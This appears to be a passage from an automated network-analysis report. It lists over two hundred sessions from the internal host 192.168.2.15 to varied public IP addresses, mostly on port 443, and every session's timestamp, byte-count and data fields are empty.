                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16962192.168.2.1538878182.231.5.215443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16963192.168.2.1538582112.113.118.159443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16964192.168.2.1541958142.156.53.131443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16965192.168.2.1544296173.31.210.50443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16966192.168.2.1555466128.159.48.196443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16967192.168.2.155592270.131.140.201443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16968192.168.2.153624412.130.90.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16969192.168.2.1552218121.180.229.53443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16970192.168.2.1538194190.91.202.98443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16971192.168.2.154964277.222.79.57443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16972192.168.2.153343877.212.199.51443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16973192.168.2.154497232.5.211.253443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16974192.168.2.1546052155.97.132.222443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16975192.168.2.153389447.74.227.62443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16976192.168.2.153950835.110.88.217443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16977192.168.2.154565285.43.181.172443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16978192.168.2.154067279.91.206.52443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16979192.168.2.154240444.54.11.96443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16980192.168.2.1533016106.56.244.224443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16981192.168.2.1536610213.72.175.23443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16982192.168.2.155374271.9.165.32443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16983192.168.2.1547964157.163.70.180443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16984192.168.2.155405299.128.122.65443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16985192.168.2.155376085.60.29.228443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16986192.168.2.1544110173.28.147.162443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16987192.168.2.155652292.90.208.84443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16988192.168.2.1549454141.172.179.203443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16989192.168.2.154608679.214.221.145443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16990192.168.2.1549266166.216.29.85443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16991192.168.2.1549794184.57.96.38443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16992192.168.2.1538292137.192.172.223443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16993192.168.2.153803294.17.153.129443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16994192.168.2.153883836.194.69.86443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16995192.168.2.1554914116.107.245.253443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16996192.168.2.1557416138.198.254.102443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16997192.168.2.1551564107.19.190.35443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16998192.168.2.153881084.186.66.77443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            16999192.168.2.1532816197.140.237.145443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17000192.168.2.1559846176.69.147.102443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17001192.168.2.155399689.210.172.239443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17002192.168.2.1548986102.207.20.243443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17003192.168.2.1541354156.148.227.163443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17004192.168.2.1549334109.250.79.205443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17005192.168.2.1557190119.43.134.76443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17006192.168.2.153514836.183.47.253443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17007192.168.2.155770259.200.108.252443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17008192.168.2.1535852223.118.68.131443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17009192.168.2.155006246.52.198.62443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17010192.168.2.1554356160.168.145.14443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17011192.168.2.1556242218.246.140.61443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17012192.168.2.153659253.127.101.30443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17013192.168.2.154487627.169.106.80443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17014192.168.2.155388848.187.136.55443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17015192.168.2.153524278.38.71.225443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17016192.168.2.1558122170.188.88.63443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17017192.168.2.1547192152.149.53.195443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17018192.168.2.1560248115.118.67.114443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17019192.168.2.153573073.192.238.27443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17020192.168.2.1558424121.240.149.165443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17021192.168.2.1548858170.196.98.198443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17022192.168.2.1549902166.127.66.102443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17023192.168.2.153626654.25.205.141443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17024192.168.2.155220284.71.27.227443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17025192.168.2.1555204191.90.102.209443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17026192.168.2.155577827.6.100.227443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17027192.168.2.154810817.135.69.179443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17028192.168.2.155893472.49.178.13443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17029192.168.2.154519291.207.86.204443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17030192.168.2.1555310159.52.9.110443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17031192.168.2.1552872201.109.42.114443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17032192.168.2.155602620.59.53.6443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17033192.168.2.155600449.46.29.65443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17034192.168.2.154191813.173.214.75443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17035192.168.2.1558096142.252.114.247443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17036192.168.2.153831274.230.38.138443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17037192.168.2.155376870.145.202.7443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17038192.168.2.1554158187.177.2.39443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17039192.168.2.155753214.106.1.113443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17040192.168.2.1542600209.20.249.104443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17041192.168.2.1542598200.232.173.193443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17042192.168.2.15364065.66.94.65443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17043192.168.2.155217237.215.223.111443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17044192.168.2.1557440206.227.42.31443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17045192.168.2.155638077.145.249.254443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17046192.168.2.155653813.8.48.122443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17047192.168.2.1560718165.122.194.143443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17048192.168.2.155336479.119.60.65443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17049192.168.2.1556722111.92.85.65443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17050192.168.2.1544206190.132.211.89443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17051192.168.2.1558842223.225.216.223443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17052192.168.2.153702627.163.47.244443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17053192.168.2.1553362218.70.87.195443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17054192.168.2.1542690216.229.57.73443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17055192.168.2.1552054164.133.104.103443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17056192.168.2.1547910145.90.31.195443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17057192.168.2.153352293.191.31.125443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17058192.168.2.154619824.188.76.171443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17059192.168.2.154345073.219.192.80443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17060192.168.2.155451882.113.46.61443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17061192.168.2.15606924.22.222.212443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17062192.168.2.1559072144.108.93.144443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17063192.168.2.1539238180.2.3.13443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17064192.168.2.153689436.82.185.230443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17065192.168.2.155604027.200.155.9443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17066192.168.2.154382032.58.222.62443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17067192.168.2.155748425.105.227.54443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17068192.168.2.153338084.32.209.254443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17069192.168.2.155392442.243.172.128443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17070192.168.2.1547082128.31.95.129443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17071192.168.2.154685423.39.108.254443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17072192.168.2.1554290193.31.192.227443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17073192.168.2.1555586197.66.209.24443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17074192.168.2.1539716100.138.203.141443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17075192.168.2.1550658139.118.222.47443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17076192.168.2.1556164184.213.84.16443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17077192.168.2.155029269.8.126.170443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17078192.168.2.1560666124.199.239.88443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17079192.168.2.1549406136.110.105.255443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17080192.168.2.156050068.177.234.149443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17081192.168.2.153539249.168.234.36443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17082192.168.2.1555704124.254.89.15443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17083192.168.2.155829457.131.130.144443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17084192.168.2.154185219.26.0.242443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17085192.168.2.155395882.95.43.5443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17086192.168.2.15369149.93.2.51443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17087192.168.2.1556812104.67.38.53443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17088192.168.2.1559474100.241.31.229443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17089192.168.2.155608267.154.36.14443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17090192.168.2.155100869.115.119.71443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17091192.168.2.155005898.72.37.95443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17092192.168.2.1541350114.149.119.8443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17093192.168.2.154624484.150.46.112443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17094192.168.2.154489493.36.149.183443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17095192.168.2.155785632.68.250.222443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17096192.168.2.1552874128.191.10.36443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17097192.168.2.1549048134.57.245.246443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17098192.168.2.155631061.100.213.94443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17099192.168.2.1551464129.101.55.20443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17100192.168.2.154487012.136.237.87443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17101192.168.2.1552650144.110.209.3443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17102192.168.2.1550846167.221.138.90443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17103192.168.2.1534504163.164.94.173443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17104192.168.2.1547106101.182.14.234443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17105192.168.2.1551432144.162.179.52443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17106192.168.2.1540352181.14.95.31443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17107192.168.2.15376981.165.81.149443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17108192.168.2.153921636.229.129.1443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17109192.168.2.1535006117.40.42.251443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17110192.168.2.1537096201.200.204.35443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17111192.168.2.155980686.108.116.41443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17112192.168.2.1552118188.36.234.77443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17113192.168.2.1558434113.143.63.162443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17114192.168.2.154420451.127.55.147443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17115192.168.2.155286024.171.78.115443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17116192.168.2.1554954157.177.14.255443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17117192.168.2.153889636.249.199.37443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17118192.168.2.154134280.35.45.60443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17119192.168.2.15366841.189.54.108443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17120192.168.2.1558618208.71.107.233443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17121192.168.2.1537628191.9.111.145443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17122192.168.2.153446659.201.14.45443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17123192.168.2.153446242.43.0.22443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17124192.168.2.153509094.146.240.244443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17125192.168.2.15340842.112.169.77443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17126192.168.2.1540170142.188.82.250443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17127192.168.2.1535182203.247.50.156443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17128192.168.2.1551298105.108.201.0443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17129192.168.2.1555170117.156.117.164443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17130192.168.2.155098834.21.49.22443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17131192.168.2.1553392210.11.18.77443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17132192.168.2.1547086121.254.20.223443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17133192.168.2.155689440.241.197.50443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17134192.168.2.155472882.194.191.97443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17135192.168.2.155692075.229.127.152443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17136192.168.2.1554852221.201.166.241443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17137192.168.2.1541362118.67.69.60443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17138192.168.2.1549042197.221.79.149443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17139192.168.2.155262434.43.44.25337215
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17140192.168.2.153528893.252.40.0443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17141192.168.2.1548468149.225.213.79443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17142192.168.2.1556946192.115.139.214443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17143192.168.2.153691817.69.17.108443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17144192.168.2.1558008107.8.0.111443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17145192.168.2.1545518220.71.99.196443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17146192.168.2.153687452.150.51.203443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17147192.168.2.1544504132.83.97.133443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17148192.168.2.1537620133.18.240.141443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17149192.168.2.154650417.60.68.119443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17150192.168.2.1548052200.14.200.76443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17151192.168.2.1554614204.47.195.85443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17152192.168.2.1541550110.88.104.147443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17153192.168.2.1548586144.51.217.79443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17154192.168.2.1542766119.200.28.137443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17155192.168.2.155121239.239.114.55443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17156192.168.2.1538008110.170.183.60443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17157192.168.2.1549462130.38.231.140443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17158192.168.2.154276618.187.150.174443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17159192.168.2.1544190195.117.239.217443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17160192.168.2.1544816175.152.235.212443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17161192.168.2.1548306205.218.103.158443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17162192.168.2.154580212.52.67.236443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17163192.168.2.153829677.108.207.110443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17164192.168.2.1549884196.82.176.60443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17165192.168.2.155931476.119.20.196443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17166192.168.2.1549422202.14.206.213443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17167192.168.2.153688448.106.232.92443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17168192.168.2.1556126139.50.154.118443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17169192.168.2.15354865.118.235.173443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17170192.168.2.1556166209.74.229.45443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17171192.168.2.1552158115.197.58.87443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17172192.168.2.1537776156.233.61.46443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17173192.168.2.1558488202.153.156.230443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17174192.168.2.1544468198.82.220.171443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17175192.168.2.1550412103.78.42.202443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17176192.168.2.155638248.39.73.137443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17177192.168.2.153604094.244.105.197443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17178192.168.2.1557432185.170.0.63443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17179192.168.2.155111214.182.135.28443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17180192.168.2.155321661.144.201.34443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17181192.168.2.1555254144.197.190.241443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17182192.168.2.154429491.114.162.200443
                                            TimestampBytes transferredDirectionData


                                            Session IDSource IPSource PortDestination IPDestination Port
                                            17183192.168.2.155646019.46.100.53443
                                            TimestampBytes transferredDirectionData


